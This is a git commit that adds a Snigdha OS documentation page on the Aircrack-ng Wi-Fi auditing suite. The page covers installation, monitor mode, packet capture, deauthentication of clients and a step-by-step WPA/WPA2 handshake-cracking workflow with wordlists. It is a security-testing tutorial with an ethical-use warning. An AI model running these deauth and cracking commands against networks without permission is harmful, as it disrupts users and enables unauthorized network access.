📝 docs(new): about aircrack ng

This commit is contained in:
Eshan Roy
2024-12-05 12:58:23 +05:30
parent 63bcd553a8
commit b98ef5fe66
8 changed files with 223 additions and 6 deletions

154
docs/tools/aircrack-ng.md Normal file
View File

@@ -0,0 +1,154 @@
---
sidebarposition: 1
---
# Aircrack-NG
### 🔐 **Aircrack-ng: A Complete Guide with Installation on Snigdha OS**
**Aircrack-ng** is a powerful suite of tools used for monitoring, testing, cracking, and securing Wi-Fi networks. This guide will cover how to install Aircrack-ng on Snigdha OS and explain its key tools. Lets dive in! 🚀
---
### 🛠️ **How to Install Aircrack-ng on Snigdha OS**
1. **Update Your System**:
Always ensure your system is up-to-date before installing new software:
```bash
sudo pacman -Syu
```
2. **Install Aircrack-ng**:
Aircrack-ng is available in the official Snigdha OS repositories:
```bash
sudo pacman -S aircrack-ng
```
3. **Verify Installation**:
Check that Aircrack-ng is installed correctly by running:
```bash
aircrack-ng --help
```
If installed successfully, you'll see a list of commands and options. ✅
---
### 🧰 **Aircrack-ng Tools Overview**
The Aircrack-ng suite includes several tools for various purposes:
1. **Airmon-ng (Monitor Mode Enabler) 🛰️**
Enables monitor mode on your wireless network interface.
**Usage**:
```bash
sudo airmon-ng start wlan0
```
This sets your `wlan0` device to monitor mode, allowing you to capture Wi-Fi traffic.
2. **Airodump-ng (Packet Capture) 📡**
Captures packets and displays information about nearby wireless networks.
**Usage**:
```bash
sudo airodump-ng wlan0mon
```
Replace `wlan0mon` with your monitor-enabled interface. It displays SSIDs, BSSIDs, channels, and more.
3. **Aireplay-ng (Packet Injection) 🎯**
Injects packets to test network security or deauthenticate clients.
**Usage**:
Deauthenticate a client to capture a handshake:
```bash
sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon
```
- `<BSSID>`: MAC address of the target access point.
- `<CLIENT_MAC>`: MAC address of the client.
4. **Aircrack-ng (Password Cracker) 🔓**
Cracks WPA/WPA2 passwords using captured handshakes.
**Usage**:
```bash
aircrack-ng -w wordlist.txt -b <BSSID> capture_file.cap
```
- `wordlist.txt`: File containing potential passwords.
- `capture_file.cap`: Packet capture file with the handshake.
5. **Airdecap-ng (Decrypt Packets) 🔐**
Decrypts WEP/WPA-encrypted packets after obtaining keys.
**Usage**:
```bash
airdecap-ng -w <WPA_KEY> capture_file.cap
```
---
### 🔍 **Example Workflow: Cracking WPA/WPA2**
1. **Enable Monitor Mode**:
Start monitoring with Airmon-ng:
```bash
sudo airmon-ng start wlan0
```
2. **Capture Packets**:
Use Airodump-ng to scan for networks:
```bash
sudo airodump-ng wlan0mon
```
Focus on a target by capturing packets on its channel:
```bash
sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write capture wlan0mon
```
3. **Deauthenticate a Client**:
Force a client to reconnect to capture the WPA handshake:
```bash
sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon
```
4. **Crack the Handshake**:
Use Aircrack-ng with a wordlist to crack the password:
```bash
aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap
```
---
### ⚠️ **Important Notes**
1. **Ethical Use Only**:
Always obtain explicit permission before testing any network. Unauthorized use is illegal.
2. **Hardware Compatibility**:
Ensure your wireless card supports monitor mode and packet injection. Popular chipsets include **Atheros** and **Realtek**.
3. **Wordlist Quality**:
Cracking success depends on your wordlist. Use comprehensive wordlists like `rockyou.txt` or generate custom ones.
4. **Alternative Tools**:
Combine Aircrack-ng with tools like **hashcat** for advanced cracking.
---
### 🚀 **Resources and Further Learning**
- [Official Aircrack-ng Documentation](https://aircrack-ng.org/)
- Tutorials on ethical Wi-Fi testing and network security.
---
By following this guide, youre equipped to install and use Aircrack-ng effectively. Remember to use these tools responsibly and ethically. Happy testing! 🎉